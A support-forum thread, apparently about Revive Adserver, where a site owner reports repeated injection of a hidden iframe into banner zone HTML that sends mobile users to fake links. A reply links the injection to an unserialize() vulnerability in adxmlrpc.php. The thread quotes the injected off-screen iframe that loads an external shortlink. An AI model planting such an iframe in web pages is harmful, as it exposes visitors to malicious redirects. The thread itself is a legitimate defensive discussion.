Jump to content

Security break on Html advanced zone

Recommended Posts

Hi guys.... I've got the last version of revive....


From about a month.. maybe more.... I've got this issue....


On ZONE (banners) -> ADVANCED I've got someone that put an Iframe line where u put HTML.... also.... all the MOBILE USERS was bombarded of fake links and more....

This link is on my SSH.... virus free obiuvsly...





When I have a alarm by the users... I delete the iframe line and all goes ok....


I've upgraded Revive.... changed password.... but ... ALL THE SAME..... 3-4-5... 10 times per day too....


ANyone got a good idea to eradicate this problem?



Share this post

Link to post
Share on other sites

The exact code they're putting on HTML tabels of the various zone is:


<iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe>


There's a possibility to hide or censure part of this to will be inefecctive?

Share this post

Link to post
Share on other sites

It is related, see the release notes for Revive 4.2, first fixed security vulnerability.

The exploit was active in the wild at least from December 2018, all pointing to the single unguarded unserialize() in adxmlrpc.php . Filtering POST requests was acceptable workaround (as suggested in


Edited by nezirus

Share this post

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Create New...